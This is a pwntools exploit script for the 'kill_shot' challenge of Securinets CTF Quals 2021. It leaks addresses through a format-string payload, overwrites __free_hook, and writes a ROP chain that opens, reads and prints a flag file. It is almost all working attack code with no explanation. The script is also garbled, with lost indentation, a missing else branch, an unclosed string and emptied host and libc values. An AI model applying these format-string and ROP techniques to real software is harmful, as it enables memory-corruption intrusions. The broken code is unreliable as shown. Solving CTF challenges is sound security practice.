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Created March 21, 2021 18:27
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Securinets CTF Quals 2021 | PWN | KILL SHOT
#!/usr/bin/env python3
from pwn import *
HOST, PORT = '', 1338
# HOST, PORT = 'localhost', 1338
exe = ELF('./kill_shot')
libc = ELF('./')
def get_proc():
if args.REMOTE:
io = remote(HOST, PORT)
io = process(exe.path)
return io
io = get_proc()
gdbscript = """
b* $rebase(0x1237)
if args.GDB and not args.REMOTE:
gdb.attach(io, gdbscript=gdbscript)
# hack the planet
leak_payload = b"%25$p|%17$p|%16$p|"
io.sendafter(b"Format: ", leak_payload)
leaks = io.recvline().strip().split(b"|")
libc_leak = int(leaks[0],16)
libc_base = libc_leak - 0x21b97
bin_leak = int(leaks[1], 16)
bin_base = bin_leak - 0x11b3
stack_leak = int(leaks[2], 16)
rop_chain_base = stack_leak+8
exe.address = bin_base
libc.address = libc_base
pop_rdi = bin_base + 0x00000000000012a3
pop_rsi = libc_base + 0x0000000000023e8a
pop_rdx = libc_base + 0x0000000000001b96
pop_r10 = libc_base + 0x0000000000130865
pop_rax = libc_base + 0x0000000000043a78
syscall = libc_base + 0x00000000000013c0
flag_file = b"/home/ctf/flag.txt"
success(f"libc_ret leak: {hex(libc_leak)}")
success(f"libc_base: {hex(libc_base)}")
success(f"bin_leak: {hex(bin_leak)}")
success(f"bin_base: {hex(bin_base)}")
success(f"stack_leak: {hex(stack_leak)}")
io.sendafter(b"Pointer: ", f"{libc.symbols['__free_hook']}")
io.sendafter(b"Content: ", p64(exe.address + 0x10b4))
def add(size=0x10, data=b"AAAA"):
io.sendafter(b"Size: ", f'{size}')
io.sendafter(b"Data: ", data)
def free(idx):
io.sendafter(b"Index: ", f"{idx}")
def arb_write_8(addr, content):
io.sendafter(b"Pointer: ", f"{addr}")
io.sendafter(b"Content: ", content)
bss = exe.bss(0x500)
arb_write_8(rop_chain_base, p64(pop_rdi))
arb_write_8(rop_chain_base + 0x8, p64(0x0))
arb_write_8(rop_chain_base + 0x10, p64(pop_rsi))
arb_write_8(rop_chain_base + 0x18, p64(bss))
arb_write_8(rop_chain_base + 0x20, p64(pop_rdx))
arb_write_8(rop_chain_base + 0x28, p64(len(flag_file)+1))
arb_write_8(rop_chain_base + 0x30, p64(libc.symbols['read']))
arb_write_8(rop_chain_base + 0x38, p64(pop_rdi))
arb_write_8(rop_chain_base + 0x40, p64(bss))
arb_write_8(rop_chain_base + 0x48, p64(pop_rsi))
arb_write_8(rop_chain_base + 0x50, p64(0))
arb_write_8(rop_chain_base + 0x58, p64(libc.symbols['open']))
arb_write_8(rop_chain_base + 0x60, p64(pop_rdi))
arb_write_8(rop_chain_base + 0x68, p64(0x5))
arb_write_8(rop_chain_base + 0x70, p64(pop_rsi))
arb_write_8(rop_chain_base + 0x78, p64(bss))
arb_write_8(rop_chain_base + 0x80, p64(pop_rdx))
arb_write_8(rop_chain_base + 0x88, p64(0x100))
arb_write_8(rop_chain_base + 0x90, p64(libc.symbols['read']))
arb_write_8(rop_chain_base + 0x98, p64(pop_rdi))
arb_write_8(rop_chain_base + 0xa0, p64(0x1))
arb_write_8(rop_chain_base + 0xa8, p64(pop_rsi))
arb_write_8(rop_chain_base + 0xb0, p64(bss - 0x50))
arb_write_8(rop_chain_base + 0xb8, p64(pop_rdx))
arb_write_8(rop_chain_base + 0xc0, p64(0x100))
arb_write_8(rop_chain_base + 0xc8, p64(libc.symbols['write']))
arb_write_8(rop_chain_base + 0xd0, p64(libc.symbols['exit']))
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